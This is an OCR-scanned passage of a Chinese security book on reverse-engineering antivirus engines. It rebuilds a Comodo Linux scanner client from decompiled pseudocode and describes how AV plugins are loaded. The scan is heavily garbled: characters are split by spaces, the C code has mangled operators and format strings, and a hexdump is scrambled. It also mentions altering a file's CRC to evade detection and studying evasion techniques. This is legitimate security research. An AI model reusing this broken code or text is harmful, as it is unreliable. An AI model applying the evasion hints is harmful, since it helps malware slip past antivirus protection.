g_Engine->baseclass_0->CAEEngineDispatch Cancel(g Engine); 
result = g Engine-»baseclass 0-»CAEEngineDispatch UnInit( 
g Engine, OLL); 
g Engine - OLL; 








if ( g FrameworkInstance ) 
{ 
result = g_FrameworkInstance->baseclass_0->CFrameWork UnInit( 
g FrameworkInstance, OLL); 
g FrameworkInstance = OLL; 
) 


最 终 关 闭 被 占用 的 libFRAMEWORK.so 库 ， 


void | cdecl dlclose framework() 
{ 
if ( hFrameworkSo ) 
dlclose(hFrameworkSo); 


} 

现在 ,我 们 收集 齐 了 所 有 为 Comodo Linux 版 编写 C/C++ 工具 的 必要 信息 。 而 且 幸 运 的 是 ， 
Comodo 反 病毒 软件 提供 了 所 有 需要 的 结构 。 因 此 ， 你 可 以 将 这 些 结构 和 枚 举 类 型 导出 到 一 个 头 
文件 (header file) 中 。 要 完成 该 操作 ， 需 要 在 IDA 内 选择 View 一 Open Subviews 一 Local Types, 
右 击 Local Types 窗 口 ， 从 弹出 菜单 中 选择 Export to Header File 选 项 。 勾 选 Generate Compilable 
Header File 选 项 ， 填 人 正确 的 导出 头 文件 路 径 ， 接 着 点 击 Export。 修 正 头 文件 中 的 一 些 编译 错误 
后 ， 就 可 以 在 C/C++ 项 目 中 使 用 它 了 。 不 过 ， 修 正 头 文件 中 的 编译 错误 ， 让 它 能 够 被 编译 器 正常 
编译 的 过 程 ， 实 在 是 个 囊 梦 。 但 这 次 你 不 需要 经 历 这 个 过 程 ， 可 以 直接 从 https:/github.comy/ 
joxeankoret/tahh/tree/master/comodo 下 载 刚 刚 提 到 的 头 文件 。 

从 GitHub 上 把 头 文件 下 载 下 来 后 ,就 可 以 开始 接 下 来 的 相关 工作 了 。 首先, 你 需要 创建 一 个 
类 似 Comodo cmdscan 的 命令 行 工具 ， 不 过 相 较 于 cmdscan， 我们 编写 的 程序 能 够 输出 更 多 有 趣 
的 信息 。 编 写 时 ， 首 先 添加 一 段 导 入 宏文 件 的 代码 : 
include <stdio.h> 
include <stdlib.h> 
include <unistd.h> 
include «string.h» 
include «pthread.h» 
include «dlfcn.h» 
include «libgen.h» 


include «errno.h» 
include «sys/types.h» 
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dinclude «sys/stat.h» 
dinclude «fcntl.h» 


*include "comodo.nh" 

上 面 展 示 的 这 些 是 程序 需要 的 头 文件 。 接 下 来 , 你 可 以 把 Hex-Rays 反 汇编 生成 的 伪 代 码 复 制 
到 你 的 项 目 中 。 不 过 要 注意 的 是 ,这 个 时 候 不 要 把 整个 反 汇 编 生成 的 文件 复制 过 来 ， 而 要 一 步 一 
步 复制 过 来 。 

int main(int argc, char **argv) 

( 


int scanned files - 0; 
int virus found - 0; 









































if ( argc == 1 ) 
return 1; 


load framework(); 
maybe IFrameWork CreateInstance(); 


Scan stream(argv[1], verbose, &scanned files, &virus found); 
printf("Final number of Scanned Files: $dWn", scanned files); 
printf("Final number of Found Viruses: $dWn", virus, found); 


uninit framework(); 
dlclose framework(); 
return 0; 


) 

在 上 面 这 段 代 码 中 ,命令 行 第 一 个 参数 代表 着 要 扫描 的 文件 。 通 过 加 载 框架 和 创建 实例 , JT 
始 扫描 任务 。 程 序 接着 会 调用 函数 scan_stream， 实 时 显示 扫描 文件 情况 ， 继 而 反 初 始 化 框架 
和 反 加 载 库 。 此 处 需要 调用 多 个 函数 : load framework, maybe IFrameWork CreateIns- 


tance, scan stream, uninit frameworkfldlclose framework, 你 可 以 直接 将 Hex-Rays 


的 反 汇 编 结 果 ， 按 照 一 个 个 函数 的 顺序 ， 把 伪 代 码 复制 过 来 。 最 终 伪 代码 效果 如 下 : 





void uninit framework() 
{ 
g base component 0x20001 = 0; 
if ( g Engine ) 
( 
g Engine-»baseclass, 0-»CAEEngineDispatch Cancel(g Engine); 
g Engine-»baseclass, 0-»CAEEngineDispatch UnInit(g Engine, 0); 
g Engine - 0; 


if ( g FrameworkInstance ) 
{ 

g FrameworkInstance-»baseclass 0-»CFrameWork UnInit( 
g FrameworkInstance, 0); 

g FrameworkInstance - 0; 


) 
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int scan stream(char *src, char verbosed, 
int *scanned, files, 
int *virus, found) 





struct base component 0x20001, t *base component  0x20001; 
int result; 

HRESULT err; 

SCANRESULT scan result; 

SCANOPTION scan, option; 

ICAVStream *inited, to zero; 





memset(&scan option, 0, sizeof(SCANOPTION)); 

memset(&scan result, 0, sizeof(SCANRESULT)); 

scan option.ScanCfgInfo = -1; 

Scan option.bScanPackers - 1; 

scan option.bScanArchives = 1; 

scan option.bUseHeur = 1; 

scan option.eSHeurLevel - enum SHEURLEVEL HIGH; 

base component, 0x20001 = * 
(struct base component 0x20001 t **)g base component, 0x20001; 

scan option.dwMaxFileSize = 0x2800000; 

Scan option.eOwnerFlag - enum OWNER ONDEMAND; 

scan option.bDunpackRealTime - 1; 

scan option.bNotReportPackName - 0; 











inited to zero - 0; 

result = base component, 0x20001-»pfunc50( 
g base component, 0x20001, 
(_ int64 *)&inited, to zero, 

. int64)src, 


Lili, 








); 
err - result; 
if ( result »- 0 ) 
{ 
err = g Engine-»baseclass 0-»CAEEngineDispatch ScanStream 
(g Engine, inited to zero, &scan option, &scan result); 
if ( err ss 0 ) 


( 


( 
1 
3 
0 


(*scanned, files)-««; 
if ( scanned files ) 
{ 
//printf("Got scan result? %d\n", scan result.bFound); 
if ( scan result.bFound ) 
{ 
printf("$s ---» Found Virus, Malware Name is %s\n", src, 
Scan result.szMalwareName); 
result - fflush(stdout); 
} 
else 


{ 
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printf("$s ---> Not VirusMn", src); 
result - fflush(stdout); 


if ( scan result.bFound ) 


if ( err >= 0 
(*virus found)-c-; 
} 


return result; 


int maybe IFrameWork CreateInstance() 
{ 

char *cur. dir; 

CFrameWork *hFramework; 

int cur. dir len; 

CFrameWork *hInstance; 

int *v8; 

int *maybe flags; 


hrinstance = 0; 

if ( FnCreateInstance(0, 0, OxF0000, &hInstance) < 0 ) 

{ 
fwrite("CreateInstance failed!\n", luLL, Ox17uLL, stderr); 
exit(1); 


BYTE4 (maybe flags) = 0; 
LODWORD (maybe flags) = -1; 
g FrameworkInstance - hInstance; 
cur dir - get current dir name(); 
hFramework - g FrameworkInstance; 
cur dir len = strlen(cur. dir); 
if ( hFramework-»baseclass 0-»CFrameWork Init 
(hFramework, cur dir len + 1, cur dir, maybe flags, 0) < 0 ) 
{ 
fwrite("IFrameWork Init failed!\n", 1uLL, 0x18uLL, stderr); 
exit (1); 
} 
free(cur dir); 
LODWORD(v8) = -1; 
BYTEA(v8) = 0; 
if ( g FrameworkInstance-»baseclass. 0- 
»CFrameWork LoadScanners(g. FrameworkInstance, v8) < 0 ) 
{ 
fwrite("IFrameWork LoadScanners failed!\n", luLL, 0x20uLL, stderr); 
exit(1); 
j 
if ( g FrameworkInstance-»baseclass. 0- 
»CFrameWork CreateEngine(g FrameworkInstance, (IAEEngineDispatch **) 
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&g Engine) < 0 ) 
{ 
fwrite("IFrameWork CreateEngine failed!\n", 1uLL, 0x20uLL, stderr); 
exit(1); 


if ( g Engine-»baseclass 0-»CAEEngineDispatch GetBaseComponent( 
g Engine, 
(CAECLSID)O0x20001, 
(IUnknown **)&g. base component, 0x20001) < 0 ) 


fwrite("IAEEngineDispatch GetBaseComponent failed!Wn", 
luLL, Ox2BuLL, stderr); 
exit(1); 
} 


return 0; 


void dlclose framework() 
{ 
if ( hFrameworkSo ) 
dlclose(hFrameworkSo); 


void load, framework() 
{ 

int filename size; 
char *self dir; 
int *y2; 
char *y3 
void *hFramework; 
char *v6; 
char filename[2056]; 


filename size = readlink("/proc/self/exe", filename, 0x800uLL); 
if ( filename size -- -1 || (filename[filename size] - 0, self dir - 
dirname(filename), chdir(self dir)) ) 
{ 
v2 = __errno_location(); 
v3 strerror(*v2); 
fprintf(stderr, "Directory error: $sWMn", v3); 
exit(1); 





hFramework = dlopen("./libFRAMEWORK.so", 1); 

hFrameworkSo - hFramework; 

if ( 1!hFramework ) 

( 
v6 - dlerror(); 
fprintf(stderr, "Error loading libFRAMEWORK: %s\n", v6); 
exit(1); 
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FnCreateInstance = (FnCreateInstance t)dlsym(hFramework, 
"CreateInstance"); 
if ( 1FnCreateInstance ) 
( 
v3 - dlerror(); 
fprintf (stderr; "£sWMn", v3); 
exit(1); 


w 


你 只 需要 在 include 指 邻 后， 添加 函数 的 前 置 声 明 ， 以 及 全 局 变量 


// 变量 声明 
int main(int argc, char **argv, char **envp); 
void uninit framework(); 
int scan stream(char *src, char verbosed, 
int *scanned files, 
int *virus found); 
int maybe IFrameWork CreateInstance(); 
void dlclose framework(); 
void load, framework(); 
void scan directory(char *src, 
unsigned _ int8 a2, 
. int64 a3, _ int64 a4); 


// 数据 声明 
char *optarg; 
char *src; 
char verbose; 
int64 g base component, 0x20001; 
int64 g user callbacks; 
CAEEngineDispatch *g Engine; 
CFrameWork *g FrameworkInstance; 











typedef int (  fastcall *FnCreateInstance t)( OWORD, | QOWORD, . OWORD, 
CFrameWork **); 
int (  fastcall *FnCreateInstance)( 


OWORD, OWORD, OWORD, CFrameWork **); 
void *hFrameworkSo; 
vtable 403310 t *vtable 403310; 


现在 ， 你 已 经 完成 了 一 个 基础 的 Comodo 命 令 行 扫描 程序 代码 编写 任务 。 接 下 来 ， 你 可 以 在 
Linux 平 台 上 使 用 以 下 命令 将 程序 编译 出 来 : 


$ g++ cmdscan.c -o mycmdscan -fpermissive \ 
-Wno-unused-local-typedefs -1dl 


为 了 测试 程序 能 和 否 运行 ， 你 需要 使 用 以 下 命令 ， 将 程序 复制 到 /opVCOMODO 有 目录 : 

$ sudo cp mycmdscan /opt/COMODO 

现在 就 可 以 测试 刚刚 编译 出 来 的 程序 是 否 能 够 像 Comodo 的 原生 命令 行 扫描 器 cmascan 一 样 
工作 了 : 
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$ /opt/COMODO/mycmdscan /home/joxean/malware/eicar.com.txt 
/home/joxean/malware/eicar.com.txt ---» Found Virus , \ 

Malware Name is Malware 
Number of Scanned Files: 1 
Number of Found Viruses: 1 


一 切 工作 正常 ! 现在 让 我 们 来 修改 程序 , 使 其 能 够 打印 出 关于 已 扫描 或 未 扫描 的 文件 情况 信 
息 。 如 果 你 查看 结构 ScANRESULT， 会 发 现 一 些 非常 有 趣 的 成 员 结 构 : 


struct SCANRESULT 
{ 














char bFound; 

int unSignID; 

char szMalwareName[64]; 
int eFileType; 


int eOwnerFlag; 

int unCureID; 

int unScannerID; 

int eHandledStatus; 
int dwPid; 

. int64 ullTotalSize; 
. int64 ullScanedSize; 
int ucrc1; 

int ucrc2; 


char bInWhiteList; 
int nReserved[2]; 





H 

比如 ,你 可 以 获取 与 你 样本 相 匹配 的 特征 码 标识 符 、 扫 描 器 标识 符 , 以 及 用 于 检测 样本 的 CRC 
文件 校 验 码 ， 还 有 了 解 样本 文件 是 不 是 在 反 病 毒 软 件 的 白 名 单 中 。 在 程序 scan_stream 中 ， 你 
可 以 通过 修改 下 面 若干 行 代码 替换 已 侦 测 样本 的 病毒 名 : 


printf("$s ---> Malware: %s\n", 
Src, 
scan, result.szMalwareName); 
if ( scan result.unSignID ) 
printf ("Signature ID: Ox$xMn", scan result.unSignID); 
if ( scan result.unScannerID ) 
printf ("Scanner : %d (%s)\n 
Scan result.unScannerID, 
get scanner name(scan result.unScannerID)); 
if ( scan result.ullTotalSize ) 
printf("Total size : $11dWMn", scan result.ullTotalSize); 
if ( scan result.ullScanedSize ) 
printf("Scanned size: $11dWMn", scan result.ullScanedSize); 
if ( scan result.ucrcl || scan result.ucrc2 ) 
printf("CRCs : Ox$x Ox$xWMn", 
Scan result.ucrcl1, 
Scan, result.ucrc2); 
result - fflush(stdout); 
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ME, Not virus 这 行 代 码 蔡 换 成 以 下 代码 : 


printf("$s ---> Not Virus\n", src); 
if ( scan result.bInWhiteList ) 

printf("INFO: The file is white-listed.'n"); 
result - fflush(stdout); 


最 后 一 步 是 将 下 列 浮 数 代 码 添 加 到 scan_stream 程 序 前 ， 将 扫描 器 标识 符 解 析 为 扫描 器 
名 称 : 





const char *get scanner name(int id) 
{ 

switch ( id ) 

( 





case 15: 

return "UNARCHIVE"; 
case 28: 

return "SCANNER PE64"; 
case 27: 

return "SCANNER MBR"; 
case 12: 

return "ENGINEDISPATCH"; 
case 7: 

return "UNPACK STATIC"; 
case 22: 

return "SCANNER EXTRA"; 
case 29: 

return "SCANNER SMART"; 
case 16: 

return "CAVSEVM32"; 
case 6: 

return "SCANNER SCRIPT"; 
case 9: 

return "SIGNMGR"; 
case 21: 

return "UNPACK DUNPACK"; 
case 13: 

return "SCANNER WHITE"; 
case 24: 

return "SCANNER RULES"; 
case 8: 

return "UNPACK GUNPACK"; 
case 10: 

return "FRAMEWORK"; 
case 3: 

return "SCANNER PE32"; 
case 5: 

return "MEMORY ENGINE"; 
case 23: 

return "UNPATCH'; 
case 2: 

return "SCANNER DOSMZ"; 


case 4: 
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return "SCANNER PENEW"; 
case 0: 

return "Default"; 
case 17: 

return "CAVSEVM64"; 
case 20: 

return "UNSFX"; 
case 19: 

return "SCANNER MEM"; 
case 14: 

return "MTENGINE"; 
case 1: 

return "SCANNER FIRST"; 
case 18: 

return "SCANNER HEUR"; 
case 26: 

return "SCANNER ADVHEUR"; 
case 11: 

return "MEMTARGET"; 
case 25: 

return "FILEID"; 
default: 

return "Unknown"; 


j 

上 述 信息 是 从 以 下 枚 举 值 中 提取 的 ,它们 已 存在 于 IDA 数 据 库 中 了 【不 要 忘 了 你 有 完整 的 调 
试 符号 ): 

enum MemMgrType 

( 





enumMemMgr Default = 0x0, 
enumMemMgr SCANNER FIRST 0x1, 
enumMemMgr_SCANNER_DOSMZ = 0x2, 
enumMemMgr_SCANNER_PE32 = 0x3, 
enumMemMgr_SCANNER_PENEW = 0x4, 
enumMemMgr_MEMORY_ENGINE = 0x5, 
enumMemMgr_SCANNER_SCRIPT = 0x6, 
enumMemMgr_UNPACK_STATIC = 0x7, 
enumMemMgr_UNPACK_GUNPACK = 0x8, 
enumMemMgr_SIGNMGR = 0x9, 
enumMemMgr FRAMEWORK = O0xA, 
enumMemMgr MEMTARGET = OxB, 
enumMemMgr ENGINEDISPATCH = O0xC, 
enumMemMgr SCANNER WHITE = OxD, 
enumMemMgr MTENGINE - OxE, 
enumMemMgr UNARCHIVE OxF, 
enumMemMgr. CAVSEVM32 0x10, 
enumMemMgr CAVSEVM64 = 0x11, 
enumMemMgr, SCANNER HEUR = 0x12, 
enumMemMgr SCANNER MEM - 0x13, 
enumMemMgr UNSFX = 0x14, 
enumMemMgr  UNPACK DUNPACK = 0x15, 
enumMemMgr SCANNER EXTRA = 0x16, 
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enumMemMgr UNPATCH = 0x17, 
enumMemMgr SCANNER RULES = 0x18, 
enumMemMgr. FILEID = 0x19, 
enumMemMgr SCANNER ADVHEUR = Ox1A, 
enumMemMgr SCANNER MBR = Ox1B, 
enumMemMgr SCANNER PE64 = O0x1C, 
enumMemMgr SCANNER SMART = 0x1D, 
un 


使 用 g++ 命令 编译 之 前 的 文件 , 将 其 复制 至 opVCOMODO 有 目录 , 然后 重新 运行 程序 , 收尾 工 
作 就 全 部 完成 了 。 这 次 ， 你 将 得 到 更 多 的 信息 : 


$ g++ cmdscan.c -o mycmdscan -fpermissive \ 
-Wno-unused-local-typedefs -1dl 























$ sudo cp mycmdscan /opt/COMODO 


$ /opt/COMODO/mycmdscan /home/joxean/malware/eicar.com.txt 
/home/joxean/malware/eicar.com.txt ---» Found Virus, 

Malware Name is Malware 
Scanner : 12 (ENGINEDISPATCH) 
CRCs : 0x486d0e3 0xa03f08f7 
Number of Scanned Files: 1 
Number of Found Viruses: 1 


根据 上 面 的 信息 , 我 们 得 知 使 用 CRC 文 件 特征 码 的 文件 扫描 引擎 名 叫 ENGINEDISPATCH。 上 
面 的 例子 使 用 的 是 EICAR 测 试 文件 , 不 过 如 果 你 使 用 的 是 不 同 的 文件 的 话 , 就 可 以 通过 改变 文件 
的 CRC 校 验 值 躲避 反 病毒 软件 的 侦 测 ,你 可 以 向 该 程序 添加 更 多 的 功能 ;添加 递归 检测 目录 功能 ， 
以 及 只 展示 有 用 信息 ( 比如 ， 白 名 单 文 件 和 已 侦 测 文件 ) 的 静默 模式 。 你 还 可 以 将 它 作 为 库 的 基 
础 ， 整 合 进 自己 的 研究 工具 集中 。 

本 工具 的 最 终 版 本 相 较 于 Comodo 的 原生 命令 行 扫 描 器 ， 增 加 了 不 少 新 的 功能 。 你 可 以 移 步 
相关 GitHub 页 面 下 载 : https://github.com/joxeankoret/tahh/tree/master/comodo。 


2.6 内核 加 载 的 其 他 部 分 


反 病 毒 软件 内 核 常 用 于 打开 文件 、 遍历 压缩 文件 或 缓冲 区 内 的 所 有 文件 , 开展 基于 特征 码 的 
病毒 扫描 或 通用 扫描 ,以 及 移 除 已 知 的 恶意 软件 。 但 有 些 任务 并 不 是 由 内 核 完成 的 , 而 是 由 反 病 
毒 软件 的 其 他 模块 完成 的 ， 比 如 插件 、 通 用 检测 模块 、 启 发 式 引 苟 等 。 这 些 模块 ( 尤其 是 插件 ) 
由 反 病 毒 软件 的 内 核 加 载 ， 来 完成 一 些 有 意思 的 任务 。 比 如 Microsoft Security Essentials Antivirus 
反 病 毒 引擎 (mpengine.dll ) 就 会 加 载 由 C++/.NET 和 Lua 和 脚本 语言 编写 的 病毒 检测 和 查 杀 程序 ， 随 
后 将 它们 从 跟随 软件 发 布 的 数据 库 文件 以 及 每 日 更 新 中 抽取 出 来 。Bitdefender 也 有 类 似 的 行为 ， 
它 会 动态 加 载 包含 相关 代码 的 二 进 制 插件 (XMD 文 件 )。 卡 巴 斯 基 通过 将 随 更 新 发 布 的 新 对 象 文 
件 重 新 链接 到 内 核 , 加 载 自身 插件 和 查 杀 程序 。 简 而 言 之 , 每 款 反 病毒 软件 的 加 载 方式 各 不 相同 。 

逆向 分 析 特 征 码 、 通 用 扫描 等 模块 的 关键 是 : 静态 或 动态 逆向 分 析 同 插件 交互 的 内 核 模块 。 如 
果 你 不 分 析 这 些 插件 是 如 何 加 密 、 压 缩 、 加 载 和 执行 的 ， 就 无 法 完全 了 解 反 病毒 软件 的 工作 原理 。 
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本 章 涵 盖 的 知识 为 本 书后 面 的 内 容 作 了 很 好 的 铺垫 。 本 章 曾 释 了 在 广 商 未 提供 现成 命令 行 工 
具 的 情况 下 , 为 了 编写 一 个 用 来 完成 自动 化 测试 和 模糊 测试 的 客户 端 库 , 需要 进行 的 逆向 分 析 反 
病毒 产品 内 核 和 其 他 组 成 部 分 的 相关 工作 。 
我 们 还 讨论 了 其 他 一 些 重要 的 知识 点 。 
O 借助 调试 符号 ， 让 逆向 分 析 过 程 更 容易 因为 反 病 毒 产品 的 基础 代码 类 似 ， 所 以 在 提供 
了 调试 符号 的 操作 系统 平台 上 逆向 分 析 相 关 模 块 ， 接 着 再 将 符号 移植 到 没有 提供 调试 符 
号 的 平台 上 是 可 行 的 。 本 章 中 提 到 了 与 此 相关 的 两 款 工具 ， 分 别 是 zynamics BinDiff 和 
Joxean Koret 的 Diaphora。 
口 Linux 是 开展 模糊 测试 和 自动 化 测试 工作 首选 的 操作 系统 ”模拟 器 Wine 和 它 的 姊妹 项 目 
Windlib 可 以 帮助 你 在 Linux 平 台 上 移植 或 运行 Windows 上 的 命令 行 扫 描 工具 。 
O 绕 过 反 病 毒 自我 保护 ”与 Windows 平 台 的 版 本 不 同 ， 反 病毒 软件 的 Linux 版 本 通常 不 带 自 
我 保护 。 为 了 能 够 调试 反 病毒 软件 ， 本 章 介 绍 了 一 些 绕 过 反 病 毒 软件 自我 保护 的 技巧 。 
D 搭建 实验 环境 为 了 开展 反 病 毒 软件 驱动 和 服务 的 调试 工作 ， 本 章 我 们 学 习 了 如 何 搭建 
虚拟 机 环境 。 男 外 ， 本 章 还 涉及 了 WinDbg 及 其 调试 命令 ， 为 你 展示 了 如 何在 内 核 态 下 开 
展 内 核 和 用 户 态 调试 。 
最 后 ， 本 章 结合 实战 案例 ， 详 细 介 绍 了 如 何 为 Comodo 反 病毒 软件 编写 一 个 客户 端 库 。 
下 一 章 将 讨论 揪 件 是 如 何 加 载 的 ， 以 及 如 何 提取 和 理解 这 项 功能 。 
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反 病 毒 插件 是 组 成 核心 反 病毒 软件 的 若干 小 部 件 。 它们 为 一 些 特定 的 任务 提供 支持 , 但 通常 
并 不 是 反 病 毒 软件 内 核 的 核心 组 成 部 分 。 反 病毒 软件 产品 内 核 通过 多 种 技术 加 载 并 在 运行 时 使 用 
插件 。 

插件 不 是 核心 库 的 重要 组 成 部 分 ， 骨 在 强化 由 反 病毒 软件 内 核实 现 的 若干 功能 特性 。 你 可 
以 将 它们 视 为 “功能 拓展 ”。 典 型 的 插件 例子 有 : PDF 解析 器 、 针 对 特定 EXE 文 件 壳 (如 UPX 壳 ) 
的 脱 壳 程序 、Intel x86 模 拟 器 、 基 于 模拟 器 的 沙 盒 程序 ， 以 及 结合 其 他 搬 件 实现 的 静态 启发 式 引 
敬 。 这 类 插件 通 常 在 运行 时 加 载 ， 使 用 手动 创建 的 加 载 系统 ， 完 成 加 密 、 解 压 、 重 定位 和 加 载 
工作 。 

本 章 将 介绍 并 分 析 典 型 的 反 病 毒 插件 的 加 载 过 程 ,并 逐个 分 析 基 于 局 发 式 的 扫 摘 算法、 模拟 
需 ， 以 及 基于 脚本 语言 的 插件 。 阅 读 完 本 章 以 后 ， 你 将 能 够 : 
口 理解 插件 加 载 器 的 工作 原理 ; 
a 分 析 插件 代码 并 了 解 从 何 处 人 手 查找 漏洞 ; 
a 研究 并 运用 免 杀 技术 。 


3.1 插件 加 载 原 理 


每 家 反 病 毒 公司 设计 和 执行 的 插件 加 载 方 式 各 不 相同 。 最 常用 的 办 法 是 分 配 读 / 写 /执行 
(RWX) 内 存 页 , 将 插件 文件 内 容 解 密 并 解压 缩 到 分 配 的 内 存 页 中 , 必要 时 重 载 代码 (Bitdefender 
就 是 这 么 做 的 )， 最 后 移 除 内 存 页 的 相关 写 和 人 权限。 这 些 新 内 存 页 构成 了 一 个 插件 模块 ， 被 加 入 
已 加 载 插 件 列表 中 。 

另外 还 有 一 些 反 病毒 软件 公司 以 动态 链接 库 (DLL ) 的 形式 提供 插件 ,依托 操作 系统 的 动态 
链接 库 加 载 机 制 ( 比如， 使 用 Microsoft Windows 操 作 系 统 中 的 API LoadLibrary )， 使 插件 的 加 载 
过 程 变 得 更 简单 。 在 这 种 情况 下 ， 为 了 保护 插件 代码 及 其 内 部 逻辑 , 通常 会 对 DLL 文件 的 代码 和 
数据 进行 混淆 。 比 如 , 反 病 毒 软件 Avira 将 其 插件 DLL 文 件 中 的 字符 串 全 部 进行 了 加 密 处 理 ， 当 插 
件 加 载 完毕 后 , 又 在 内 存 中 解密 ( 通过 一 个 简单 的 XOR 算 法 和 预存 在 插件 代码 中 的 固定 key 实 现 )。 

在 另 一 个 案例 中 , 卡巴 斯 基 反 病毒 软件 使 用 了 一 种 完全 不 同 的 插件 加 载 方式 : 插件 更 新 文件 
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以 COFF 对 和 象 文件 格式 下 载 到 用 户 晶 
接 下 来 将 讨论 各 类 扣 


3.1.1 反 病 毒 软件 的 全 功能 链接 器 




















电脑 中 ， 接 着 它们 又 被 链接 到 反 病 毒 软件 内 核 中 。 
MEMRI RRRA HE, 


卡巴 斯 基 的 更 新 文件 以 通用 对 象 文 件 格式 (common object file format, COFF ) 提供 ， 而 不 
是 动态 加 载 链接 库 或 创建 RWX 内 存 页 然后 将 插件 的 代码 逻辑 释放 到 内 存 页 中 。 在 解密 和 解压 缩 
后 ， 这 些 COFF 文 件 与 带 有 静态 链接 的 所 有 插件 链接 到 一 起 ， 同 时 新 生成 的 二 进 制 文件 构成 了 新 
内 核 。 从 反 病 毒 软件 开发 者 的 角度 来 看 ， 该 技术 内 存 消耗 少 且 启动 速度 快 ; 但 从 另 一 方面 来 看 ， 
这 需要 卡巴 斯 基 开 发 者 们 编写 并 维护 一 个 全 功能 链接 器 。 

















提示 “通用 对 象 文件 格式 用 于 存储 已 编译 的 代码 和 数据 ，COFF 文 件 用 于 链接 阶段 ( 最 后 的 编译 


阶段 ) 来 生成 一 个 可 执行 模块 。 


这 些 更 新 文件 多 为 后 缀 名 为 *.avc 的 小 文件 ， 比 如 base001.avc。 这 类 文件 的 文件 头 如 下 : 


0000 41 56 
0010 74 61 
0020 72 773 
0030 31, 33 
0040 4B 61 
0050 36 20 
0060 32 3A 
0070 00 00 
0080 45 4B 


在 此 案例 中 ， 


50 
62 
6B 
2E 
73 
53 
31 
00 
2E 


ASCI 文 件 头 一 开始 为 AV 


20 41 
61 73 
79 20 
00 00 
70 65 
65 70 
38 00 
00 00 
38 03 


6E 
65 
4C 
00 
72 
20 
00 
00 
00 


74 
2E 
61 
00 
73 
32 
00 
00 
00 


69 
20 
62 
00 
6B 
30 
00 
00 
00 


76 
28 
20 
00 
79 
31 
00 
00 
01 


69 72 
63. 29 
31.-39 
00 00 
20 4C 
33 20 
00 00 
00 00 
00 00 


61 
4B 
39 
00 
61 
20 
00 
00 
00 


6C 
61 
37 
00 
62 
31 
00 
0D 
E9 


20 
73 
2D 
00 
2E 
30 
00 
0A 
66 


44 61 AVP Antiviral Da 
70 65 tabase. (c)Kaspe 
32 30 rsky Lab 1997-20 
0D 0A d35tent des see SA 
20 31 Kaspersky Lab. 1 
3A 30 6 Sep 2013 10:0 


00 00 PE S 
OD QA uedessessecersetx6 e 
02 00 BR a E. 


P Antiviral Database. (c)Kaspersky Lab 


1997-2013 ， 接 着 用 字符 0x00 填 充 ， 然 后 更 新 包 发 布 日 期 (Kaspersky Lab. 16 Sep 2013 


10:02:18 )， 而 后 又 用 多 个 0x00 字 符 填 充 。 











届 移 0x80 是 文件 头 的 末尾 ， 接 下 来 就 是 文件 的 实际 


二 进 制 数据 。 这 些 二 进 制 数据 采用 简单 的 XOR-ADD 算 法 加 密 。 这 些 数据 解密 后 ， 将 会 使 用 一 种 
定制 的 算法 解压 缩 。 解 压缩 后 ， 你 将 会 得 到 一 系列 链接 在 一 起 的 COFF 文 件 (使 用 AvpBase.DLL 
库 中 的 程序 ) 以 供 目标 操作 系统 使 用 。 





目前 似乎 只 有 卡巴 


模块 加 载 过 程 。 














3.1.2 ”理解 动态 加 载 


动态 加 载 是 最 典型 的 反 病 毒 搬 件 加 载 方式 。 这 些 插件 文件 不 仅 存在 于 容器 文件 中 ( 比如 Panda 
Antivirus 的 PAV.SIG 文 件 、Avast 的 *.VPS 文 件 或 Microsoft Antivirus 的 *.VDB 文 件 )， 也 有 可 能 分 布 
在 许多 碎片 文件 中 C 比如 Bitdefender )。 这 类 文件 通常 会 借助 zlib 进 行 加 密 ( 每 个 反 病毒 厂商 会 使 
用 不 同 的 加 密 方式 ) 和 压缩 。 在 必要 的 时 候 , 插件 文件 首次 被 解密 后 ( 比如 ，IMicrosoft 并 没有 加 





斯 基 反 病毒 内 核 正 在 使 用 这 种 加 载 捐 








上 件 的 方式 。 本章 稍 后 将 详细 讨论 择 件 
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密 反 病毒 数据 库 ， 而 仅仅 是 压缩 了 一 下 ) 会 被 加 载 入 内 存 中 。 为 了 将 插件 文件 加 载 到 内 存 中 , pc 
病毒 内 核 通常 会 在 堆 上 创建 一 个 RWX 内 存 页 面 ， 将 解密 和 解压 缩 后 的 文件 数据 复制 到 新 创建 的 
内 存 页 面 中 ， 并 调整 内 存 页 面 的 权限 ， 必 要 时 重新 定位 内 存 中 的 代码 。 

逆向 分 析 采 用 动态 加 载 技术 的 反 病 毒 产 品 , 要 比 采 用 静态 对 象 链接 技术 (卡巴 斯 基 采 用 的 方 
A) 的 产品 困难 得 多 ， 因 为 系统 启用 的 ASLR 技 术 ， 使 每 次 内 核 加 载 的 数据 块 的 内 存 地 址 是 随机 
的 。 之 所 以 让 逆向 过 程 变 得 困难 ， 是 因为 在 IDA 内 所 有 注释 、 指 定 的 函数 名 等 不 会 迁移 到 插件 代 
码 所 在 的 你 调试 的 新 内 存 页 面 处 。 这 里 有 一 个 能 部 分 解决 这 个 问题 的 方案 。 比如 , 使 用 开源 的 IDA 
插件 Diaphora 或 收费 版 的 zynamics BinDiff， 在 载 信 内存 过 程 中 ， 对 包含 注释 和 函数 名 的 数据 库 进 
行 二 进 制 文件 比较 〈 这 个 过 程 也 称 作 BindDiffing ) 

通过 BindDiffing， 你 可 以 从 之 前 的 IDA 数 据 中 ， 将 相关 信息 导入 到 新 的 相同 实例 中 去 ( 从 不 
同 的 内 存 地 址 中 加 载 )。 但 令 人 感到 窜 火 是 ， 每 次 加 载 调试 器 以 后 ， 就 要 重新 载 人 一 次 插件 。 还 
有 其 他 一 些 开源 插件 ， 比 如 IDA 的 插件 MyNav。 你 可 以 通过 该 插件 的 导入 和 导出 功能 编辑 所 需 的 
插件 代码 。 然 而 ， 使 用 MyNav 插 件 同 样 需要 你 每 次 执行 的 时 候 重 新 载 人 一 次 插件 。 

有 一 些 反 病毒 软件 内 核 没有 针对 它们 的 插件 采取 保护 措施 , 这 些 插件 的 相关 程序 库 可 以 直接 
在 IDA 中 打开 并 调试 。 但 是 这 种 情况 少 之 又 少 ， 目 前 已 知 的 只 有 Comodo Antivirus。 






































































































































一 些 反 病毒 软件 会 将 所 有 更 新 文件 置 入 容器 文件 中 ， 而 不 是 以 单个 文件 的 形式 推送 更 新 。 
如 果 你 研究 的 反 病 毒 软件 使 用 了 容器 文件 格式 , 在 研究 容器 内 部 文件 之 前 , 需要 好 好 研究 该 容 
器 的 文件 格式 。 对 于 反 病 毒 厂 商 来 说 ,这 两 种 方式 均 各 有 利 商 。 如 果 使 用 了 容器 封装 ,厂商 的 
代码 知识 产权 得 以 保护 , 但 对 于 研究 人 员 来 说 , 研究 过 程 中 就 需要 逆向 此 类 文件 格式 并 编写 脱 
